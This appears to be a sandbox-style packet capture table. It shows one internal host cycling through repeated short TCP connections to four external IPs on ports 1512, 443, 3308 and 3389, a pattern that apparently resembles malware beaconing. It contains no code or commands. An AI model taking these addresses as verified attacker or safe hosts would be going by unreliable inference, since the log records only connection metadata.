Jan 11, 2021 16:53:30.626378059 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.679308891 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.679611921 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.716672897 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.732784033 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.830115080 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.830149889 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.830291986 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.833002090 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.886004925 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.945518970 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:30.997632980 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:30.997847080 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:30.999134064 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.051101923 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.065752983 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.065985918 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.079248905 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.133604050 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.133961916 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.144479036 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.145015955 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.197333097 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.197566032 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.250509024 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.366561890 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.366585016 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.366828918 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.366873980 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.370413065 CET	49303	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:31.422262907 CET	443	49303	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:31.490168095 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.533535957 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.533668041 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.534847975 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.577883005 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.590186119 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.590208054 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.590334892 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.608200073 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.653228045 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.653424978 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.662935019 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.663206100 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.706331015 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.706551075 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.745990038 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.750319958 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.750349045 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.861418009 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.861485004 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.861654043 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.866708994 CET	49304	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:31.909874916 CET	3308	49304	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:31.989679098 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.043714046 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.043807030 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.045347929 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.101983070 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.131233931 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.131252050 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.131340981 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.144879103 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.207185030 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.207484961 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.214473009 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.214622021 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.271933079 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.272243023 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.313540936 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.326595068 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.326615095 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.413570881 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.413589001 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.413685083 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.415832996 CET	49305	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:32.469623089 CET	3389	49305	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:32.532496929 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.585356951 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.585444927 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.586779118 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.640034914 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.649533033 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.649549961 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.649665117 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.662604094 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.717536926 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.717749119 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.727626085 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.727826118 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.780770063 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.781054974 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.816811085 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.834007978 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.929167032 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.929217100 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:32.929472923 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.932317019 CET	49306	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:32.985315084 CET	1512	49306	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:33.053086042 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.105191946 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.105354071 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.106731892 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.158513069 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.173336029 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.173518896 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.188107967 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.243416071 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.243767023 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.253012896 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.253243923 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.305217981 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.305560112 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.343101025 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.357609987 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.474672079 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.474742889 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.474988937 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.481240034 CET	49307	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:33.533198118 CET	443	49307	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:33.596018076 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.639334917 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.639463902 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.640425920 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.683787107 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.695473909 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.695494890 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.695678949 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.709985971 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.755640030 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.755939007 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.765836000 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.766050100 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.809184074 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.809401035 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.849355936 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.852684975 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.852734089 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.965230942 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.965257883 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:33.965503931 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:33.968080044 CET	49308	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:34.011131048 CET	3308	49308	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:34.080085993 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.133904934 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.134028912 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.135677099 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.190288067 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.215380907 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.215416908 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.215498924 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.215522051 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.228491068 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.287347078 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.287679911 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.298335075 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.298527956 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.352257013 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.352447987 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.392143011 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.406841040 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.406887054 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.496450901 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.496474981 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.496701956 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.496757984 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.502322912 CET	49309	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:34.558080912 CET	3389	49309	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:34.626019001 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.679085016 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.679245949 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.681339025 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.734286070 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.741120100 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.741153002 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.741309881 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.741419077 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.750220060 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.804454088 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.804647923 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.809523106 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.809578896 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.862540007 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.862828016 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:34.900922060 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.915906906 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:34.915946007 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:35.019083977 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:35.019109011 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:35.019330025 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:35.024637938 CET	49310	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:35.078396082 CET	1512	49310	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:35.141793966 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.193964958 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.194202900 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.195789099 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.247891903 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.263087034 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.263206005 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.276649952 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.331192970 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.331490040 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.344966888 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.345340014 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.397480965 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.397655010 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.434907913 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.449780941 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.567156076 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.567209005 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.567462921 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.573117971 CET	49311	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:35.625298023 CET	443	49311	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:35.687366962 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.730582952 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.730766058 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.732615948 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.775728941 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.795244932 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.795277119 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.795372963 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.795413017 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.809175968 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.855814934 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.856112957 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.866669893 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.867013931 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.910208941 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.910429955 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:35.950164080 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:35.953620911 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:36.066664934 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:36.066708088 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:36.066977024 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:36.072702885 CET	49312	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:36.115931988 CET	3308	49312	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:36.186444044 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.240080118 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.240222931 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.241775036 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.295254946 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.329123974 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.329175949 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.329296112 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.331118107 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.342809916 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.408138037 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.408473969 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.418812990 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.419042110 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.472645044 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.473018885 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.515217066 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.526592016 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.526618958 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.617861032 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.617878914 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.618015051 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.620296001 CET	49313	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:36.673830032 CET	3389	49313	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:36.732347965 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.785238981 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.785376072 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.786855936 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.840715885 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.846908092 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.846940041 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.847021103 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.847064972 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.860932112 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.914849043 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.914972067 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.936717987 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.937000990 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:36.991430998 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:36.991528988 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:37.028661013 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.044251919 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.044285059 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.146527052 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.146552086 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.146672010 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:37.152335882 CET	49314	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:37.204998016 CET	1512	49314	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:37.262928963 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.314884901 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.315046072 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.316857100 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.368551970 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.383410931 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.383517027 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.401190042 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.455359936 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.455629110 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.465958118 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.466399908 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.518081903 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.518241882 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.572328091 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.688792944 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.688834906 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.689059973 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.695816994 CET	49315	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:37.747512102 CET	443	49315	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:37.807766914 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.850857019 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:37.850960970 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.852108955 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.895178080 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:37.905898094 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:37.905915976 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:37.906038046 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.923083067 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.968081951 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:37.968219042 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.977988005 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:37.978368998 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:38.022095919 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.022249937 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:38.062030077 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.065429926 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.065608978 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.177443027 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.177467108 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.177670002 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:38.183218956 CET	49316	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:38.226078987 CET	3308	49316	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:38.288528919 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.343342066 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.343415022 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.344132900 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.403017998 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.441251993 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.441270113 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.441375017 CET	49317	3389	192.168.2.22	5.100.228.233
